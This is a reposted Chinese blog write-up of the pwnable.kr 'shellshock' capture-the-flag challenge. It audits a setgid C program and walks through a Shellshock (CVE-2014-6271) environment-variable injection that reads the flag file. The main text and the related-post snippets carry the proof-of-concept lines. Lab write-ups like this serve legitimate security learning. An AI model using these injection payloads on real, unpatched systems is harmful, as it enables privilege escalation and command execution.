【pwnable.kr】 shellshock

最新推荐文章于 2024-07-28 22:11:47 发布
最新推荐文章于 2024-07-28 22:11:47 发布
阅读量111 收藏
点赞数
文章标签: 操作系统 运维 c/c++
原文链接:http://www.cnblogs.com/p4nda/p/7119218.html
版权

 

 

pwnable从入门到放弃,第五题。

ssh shellshock@pwnable.kr -p2222 (pw:guest)

这题主要涉及了一个关于bash的CVE漏洞。

首先还是下载源代码审计一下,shellshock.c

#include <stdio.h>
int main(){
    setresuid(getegid(), getegid(), getegid());
    setresgid(getegid(), getegid(), getegid());
    system("/home/shellshock/bash -c 'echo shock_me'");
    return 0;
}

首先是一个关于可执行程序权限的问题,就是关于uid和gid的。

先看一下各个文件的权限

首先启动时,用户是shellshock权限,也就是other权限,这样的话对flag还是不可读的。linux开关机熟练选手根本就没懂啥意思。

后来发现shellshock这个可执行文件对group是具有特殊权限w的,这就意味着egid是属于shellshock_pwn的,这个权限很高,对flag文件是可读的,这也就涉及到了linux可执行文件权限继承和赋予问题。

我查阅了一下《C和C++安全编码》书中讲权限部分的,这相当于设置了egid,因此在代码中setreuid中设置的各uid均是预置的高权限,即egid——shellshock_pwn,因此这个可执行文件在执行到system一行时,就已经是具有shellshock_pwn组权限的程序了。

bash也是用这个组权限在打开,所以对flag是可读的。

 

解决了权限问题,就可以考虑如何代码执行了,这个破壳漏洞是可以作为一个本地提权漏洞使用,参考金山毒霸在freebuf上的漏洞分析贴,:http://www.freebuf.com/articles/system/45390.html

可以使用上面提到了poc,

env x='() { :;}; echo vulnerable' bash -c "echo this is a test" 

可验证这个漏洞在./bash上是存在的:

 

将echo v...' 换成想执行的命令 bash -c "cat ./flag"'

而./ bash -c "echo this is a test" 换成./shellshock

 

 

偷个懒,破壳漏洞明天再看。  

转载于:https://www.cnblogs.com/p4nda/p/7119218.html

weixin_30284355
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
每日一题pwnable.kr shellshock
Kni9hT's Blog
09-04 351
Bash远程执行漏洞“破壳” [注:bash版本要在4.1以下] bash引自维基百科的描述为: "bash,Unix shell的一种。1989年发布第一个正式版本,原先是计划用在 GNU操作系统上,但能运行于大多数类Unix系统的操作系统之上,包括Linux与Mac OS X v10.4都将它作为默认shell。它也被移植到Microsoft Windows上的Cygwin与MinGW,或...
shellshock
12-10
shellshock代码,网页形式,看起来不错,需要到可以试试哦。
pwnable.kr shellshock wp
Pz_mstr's Blog
12-19 170
0x01 shellshock CVE-2014-6271 attack 0x02 principles https://blog.csdn.net/qq_27180763/article/details/88049178 0x03 payload export foo='() { :; }; ./bash' ./shellshock cat flag 0x04 flag shellshock@...
pwnable.kr 简单题目详细笔记汇总
H4ppyD0g的博客
09-12 866
pwnable.kr fd pwnable.kr collision pwnable.kr bof pwnable.kr flag pwnable.kr passcode pwnable.kr random pwnable.kr input pwnable.kr leg pwnable.kr mistake pwnable.kr shellshock pwnable.kr coin1 pwnable.kr lotto pwnable.kr cmd1 pwnable.kr cmd2 pwnable.kr u
[pwnable.kr]shellshock
iekuil的博客
10-03 199
可以看到这里对() {开头的字符串没有太多检查就传给了parse_and_execute,而直接用bash会从环境变量PATH里面找系统默认的bash,而这个bash是没有漏洞的。靶场环境当前目录下的bash才是有漏洞的bash,调用时需要用./bash。2.需要有能够执行的高权限的程序,并且程序中存在启动bash子进程的操作。跟着网上的分析简单看了一下bash 4.3的varieble.c文件,就是之前的几个题都可以直接以文件名运行文件,可惜定义的很多东西不清楚干啥用的,测试的时候又把前面的坑踩了一次,
pwnable.kr-shellshock WP
Casuall的博客
05-08 316
这道题涉及的知识点是shellshock(也叫破壳漏洞)CVE-2014-6271,GNU Bash 版本小于等于4.3可能存在这个漏洞。首先查看一下有什么文件 发现目录里有一个可执行文件bash,我们来查看一下bash的版本 可以看到这个路径中的bash版本低于4.3,下面来测试一下这两个版本的bash是否存在破壳漏洞 env x='() { :;}; echo shellshocked' ...
pwnable.krshellshock
river
05-04 1086
shellshock 登陆上服务器看到有shellshock文件,还有一个bash文件,执行./shellshock shellshock不是CVE-20146271吗? 根据搜到的结果进行测试: 正常执行过程分析 Bash有一种独有的使用环境变量来定义函数的方法。如果环境变量的值以字符”(){”开头,那么这个变量就会被当作是一个导
pwnable.kr shellshock
r250414958的博客
08-04 171
看一下题目 连上去看看有什么 看下shellshock.c #include <stdio.h> int main(){ setresuid(getegid(), getegid(), getegid()); setresgid(getegid(), getegid(), getegid()); system("/home/shellshock/bash -c 'echo s...
pwnable.kr [shellshock]
shisuan1的博客
12-09 241
pwnable.kr [shellshock] Mommy, there was a shocking news about bash. I bet you already know, but lets just make it sure
pwnable.kr之Toddler‘s Bottle 9~16题知识点记录
weixin_42877778的博客
06-30 364
pwnable.kr的8~16题知识点记录
Bash漏洞——Shellshock浅析.pdf
07-10
【Bash漏洞——Shellshock浅析】 Bash漏洞,又称Shellshock,是指在2014年被发现的一个严重安全漏洞,它影响了广泛使用的Bash shell,这是一个在Unix-like操作系统,包括Linux和Mac OS X中的命令行解释器。这个漏洞...
Bash漏洞-Shellshock浅析.pdf
07-10
【Bash漏洞与Shellshock】 Bash漏洞,又称为Shellshock,是指在2014年发现的一种严重安全漏洞,影响了广泛使用的Bash shell程序。Bash是Unix-like操作系统,包括Linux和Mac OS X的默认命令行解释器。这个漏洞的存在...
Lab-03--Shellshock.zip
12-22
Shellshock漏洞详解及其在Linux环境下的防范》 Shellshock漏洞,全名是BASH(Bourne Again SHell)漏洞,是2014年9月被发现的一个严重安全漏洞,影响了广泛使用的Unix/Linux操作系统及基于这些系统的服务器、路由器...
shellshock 补丁 for rhel5.11 x64
10-08
shellshock 补丁 for rhel5.11 x64
Linux网络工具“瑞士军刀“集合
分享不一样的技术,与你一起共同成长!
07-26 309
下面结合之前的一些使用经验为大家介绍一下一些经典应用场景下,这个网络命令工具如何使用的。例如怎么查看当前服务器监听哪些端口、连接目标主机端口情况如何?平常我们在进行Linux服务器相关运维的时候,总会遇到一些网络相关的问题。我们可以借助这些小巧、功能强悍的工具帮助我们排查问题、解决问题...
Linux 三剑客之 grep
Tallbo的博客
07-26 806
grep 是 Linux 中用于文本搜索的强大工具,可以在文件中搜索指定的模式,并输出包含该模式的行。
基于宝塔的 Bytebase 可视化安装、配置、部署教程
Bytebase的博客
07-26 378
Bytebase是一款使用Go语言开发的开源数据库管理软件,旨在为DBA(数据库管理员)、开发人员和平台工程师提供一个基于Web的协作工作区,用于管理数据库的整个生命周期。本文将介绍如何在宝塔面板上可视化安装、部署、配置Bytebase教程。
《汇编语言 基于x86处理器》- 读书笔记 - 第3章-汇编语言基础
最新发布
灵台方寸山斜月三星洞
07-28 470
本章首先介绍了基本语言元素,包括整数和实数常量、字符和字符串常量、保留字、标识符、伪指令和指令格式。接着,通过示例程序演示了整数加减法的操作。还详细解释了汇编、链接和运行程序的整个流程,包括源代码编写、编译/汇编、链接和加载执行。还有如何定义数据,包括内部数据类型、数据定义语句和符号常量。最后还涉及了64位编程。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值